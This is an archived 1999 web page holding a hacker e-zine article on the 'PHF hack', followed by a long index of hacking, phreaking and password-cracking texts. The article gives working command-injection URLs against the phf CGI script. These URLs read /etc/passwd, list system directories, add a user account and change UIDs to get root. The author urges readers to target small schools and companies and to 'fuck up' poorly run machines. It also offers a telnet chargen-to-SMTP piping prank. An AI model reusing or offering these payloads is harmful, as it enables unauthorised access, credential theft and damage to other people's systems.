¦ R E A L I T Y C H E C K N E T W O R K! ¦_ +----------------------------------------------------------------------------¦_ ¦ ¦ ¦ From Issue #33 - PHF Web Hacking ¦ ¦ by Dagashi ¦ ¦____________________________________________________________________________¦_ ¦____________________________________________________________________________¦_ +----------------------------------------------------------------------------¦_ ¦ ¦_ ¦ Alright there kiddies, it's time to lightly dive into the world of ¦_ ¦ how to obtain shells that do not rightfully belong to you and how to ¦_ ¦ generally piss off people on the Internet. As always, this is a well ¦_ ¦ known bit on information (because no one in their right mind would give ¦_ ¦ you an exploit to a system that no one else knows of), so I take no ¦_ ¦ responsibility for whatever you do with it. ¦_ ¦ ¦_ ¦ Since the majority of computers on the Internet are of UNIX decent, ¦_ ¦ I will be mainly talk about their problems and such. Now, the majority ¦_ ¦ of us know that UNIX is full of holes and other problems no matter what ¦_ ¦ revisions and patches are made, so this might not come as a big surprise ¦ ¦ when I tell you there is a common exploit that will run any program on ¦ ¦ your victim machine. It is the PHF hack. Though it is no big deal to ¦ ¦ the majority of ISP's, most little companies do not have the time or ¦ ¦ money to deal with all the problems of their operating systems. Small ¦ ¦ schools that are NOT technologically oriented, like high schools with ¦ ¦ T1's and such would be a good example. And so, this will work on some ¦ ¦ of them. ¦ ¦ ¦ ¦ All that is required to be done is to put this into the URL of ¦ ¦ Netscape: ¦ ¦ ¦ ¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd ¦ ¦ ¦ ¦ and you have a listing of the passwd file to use or abuse. But the ¦ ¦ PHF exploit can do more then just that (for those of you who will be ¦ ¦ flaming me for writing such a simple article). It can access any type ¦ ¦ of program that is on the opposing computer and run it. ¦ ¦ ¦ ¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/ ¦ ¦ ¦ ¦ will give you the directory listing of everything from the root of ¦ ¦ the system. From there, you can just alter it accordingly to have a ¦ ¦ peek around the system to see what else you can learn. ¦ ¦ ¦ ¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/bin ¦ ¦ ¦ ¦ would show you every command that is available in the bin dir. If ¦ ¦ you slightly modified it, you would also be able to see the permissions ¦ ¦ of the specific files. ¦ ¦ ¦ ¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin ¦ ¦ ¦ ¦ which can come in handy since, well, seeing as how you have root ¦ ¦ permissions you now have a nice little bit of information about how the ¦ ¦ system functions can use that to get even more access or information out ¦ ¦ of it. ¦ ¦ ¦ ¦ Or the best one of them all: ¦ ¦ ¦ ¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/adduser%20dagashi ¦ ¦ %20dagashi%20100%20 ¦ ¦ ¦ ¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20dagashi%0 ¦ ¦ ¦ ¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20root%500 ¦ ¦ ¦ ¦ Do that and you MIGHT have root access to the server by telnet. Be ¦ ¦ forewarned that this is an old hack and many servers would not have the ¦ ¦ PHF script still running or have chmoded it to 000. This can get you ¦ ¦ into a bunch of trouble, so be careful. As I said before, this is well ¦ ¦ known and I wouldn't give it out to you unless most system ¦ ¦ administrators (if they deserve the title then they know this hack by ¦ ¦ heart) knew it as well. But there are always those that don't deserve ¦ ¦ the honor of the name, and to those, you have my full consent to fuck up ¦ ¦ their machines to hell. ¦ ¦ ¦ ¦ For fun and excitement, type "telnet 127.0.0.1 19 | telnet 127.0.0.1 ¦ ¦ 25" in Linux and watch life become a ball. ¦ ¦ ¦ +----------------------------------------------------------------------------+
This page was created Wed Aug 11 23:34:55 EDT 1999
Using Linux
version 2.0.32
on an i586
Main Page @ Matarese.com
The Myth of the 2600Hz Detector @ Matarese.com
Acquiring Account Information @ Matarese.com
Act2! by Symantec @ Matarese.com
All hacks / Annoyance @ Matarese.com
Alt 2600 Group FAQ @ Matarese.com
Hacking Angelfire @ Matarese.com
Anonymous E-Mail @ Matarese.com
Anonymous FTP: Frequently Asked Questions (FAQ) @ Matarese.com
Maintaining Access - Implementing Backdoors @ Matarese.com
How to Receive Banned Newsgroups FAQ @ Matarese.com
Hacking BBS's @ Matarese.com
phreaking tutorial @ Matarese.com
The Bluebox @ Matarese.com
List of Common Bugs @ Matarese.com
Things that go Bump on the Internet @ Matarese.com
Hacking Calling Cards @ Matarese.com
Expanding the capacity of Caller ID Boxes @ Matarese.com
What is Caller-ID? @ Matarese.com
Hacking Call Back Verify @ Matarese.com
CULT OF THE DEAD COW @ Matarese.com
Cellular Roaming: The New Deals @ Matarese.com
CELLULAR TELEPHONE PHREAKING PHILE SERIES @ Matarese.com
Cracking Unix passwords @ Matarese.com
Hacking Webpages @ Matarese.com
The Matarese Circle @ Matarese.com
Cisco Password Cracking Script @ Matarese.com
Customer Name and Address @ Matarese.com
Cops and Robbers | UNIX Security @ Matarese.com
Cracking NT Passwords @ Matarese.com
Odins cracking/coding and PPE resources @ Matarese.com
Credit Carding Part I @ Matarese.com
How do I defeat Copy Protection? @ Matarese.com
What are the DTMF frequencies? @ Matarese.com
Exploits FAQ @ Matarese.com
Making Free Calls @ Matarese.com
FTP Bouncing @ Matarese.com
Hackers Encyclopedia @ Matarese.com
The Conscience of a Hacker / Hacker Manifesto @ Matarese.com
Hacking from Windows9x FTP @ Matarese.com
Hacking Tripod @ Matarese.com
Hacking Web Pages @ Matarese.com
How to crack a UNIX password file. @ Matarese.com
Hacking Servers : A Begginners Guide @ Matarese.com
TIPS FOR TRACKING HACKERS @ Matarese.com
Hacking Tutorial @ Matarese.com
Hacking UNIX @ Matarese.com
How to Hack the WWWboard Message Board 2.0 @ Matarese.com
Hackers Handbook @ Matarese.com
Guide to Harmless-Hacking @ Matarese.com
All about security holes @ Matarese.com
Hacking Hotmail @ Matarese.com
How to crack by +ORC complete tutorial in one file (BIG!) @ Matarese.com
]How to Hack from from Harlequin and Archangel @ Matarese.com
Improve security by breaking into your site @ Matarese.com
Ch1can0 BEOWULF @ Matarese.com
Internet Security @ Matarese.com
Bugs and Backdoors in IRC clients, scripts and bots @ Matarese.com
IRC Hacking @ Matarese.com
FAQ for Trading For FileZ in IRC @ Matarese.com
Creating a Xdcc offer bot for irc @ Matarese.com
Integrated Systems Digital Network @ Matarese.com
Everything you should know about computer viruses @ Matarese.com
Lan Technology Scorecard @ Matarese.com
Local Area Signalling Services (LASS) and Custom Calling Feature Control Codes @ Matarese.com
Harmless Hacking - Linux @ Matarese.com
INDEX @ Matarese.com
Loops wanted! @ Matarese.com
Mail Spoofing Explained @ Matarese.com
Microsoft IIS Vulnerability @ Matarese.com
Microsoft(Yuk) Index Server exposes IDs and Passwords @ Matarese.com
Intresting Microsoft Access 7.0 Trick @ Matarese.com
MS Money 2.0 Back Door @ Matarese.com
Mind Your Own Business (MYOB) @ Matarese.com
Nameserver listing! @ Matarese.com
Newbies handbook / HOW TO BEGIN IN THE WORLD OF H/P @ Matarese.com
Bugs in Windows NT (Too many to list here completely...) @ Matarese.com
This Hack is for the OptiChat Original Chat Room @ Matarese.com
Internet Outdials @ Matarese.com
Pager Frequencies @ Matarese.com
Password Recovery Techniques @ Matarese.com
How to Steal Local Calls from Most Payphones @ Matarese.com
PBX's (Private Branch Exchanges) and WATS @ Matarese.com
Cryptography / PGP @ Matarese.com
Introduction to the Internet Protocols @ Matarese.com
Analysis of QueSO Performance @ Matarese.com
Finger - ATTACKING FROM THE OUTSIDE @ Matarese.com
L0pht Security Advisory - Sendmail 8.7.5 @ Matarese.com
Sniffer FAQ V 1.7 @ Matarese.com
SSPING/JOLT patches @ Matarese.com
WORKING OUT-TELNETS @ Matarese.com
How do I post to a moderated newsgroup? @ Matarese.com
What You Should Know About Computer Viruses @ Matarese.com
How can I protect myself from viruses and such? @ Matarese.com
What is a trojan/worm/virus/logic bomb? @ Matarese.com
VMS Info (Password Cracking) @ Matarese.com
HACKING THE WAL-MART ARMORGUARD COMPUTER PROTECTION SYSTEM @ Matarese.com
Using web proxies to disguise your IP address @ Matarese.com
Dig up hidden CD Keys @ Matarese.com
X-Windows Security @ Matarese.com
Copyright (C) 1999 - Matarese.com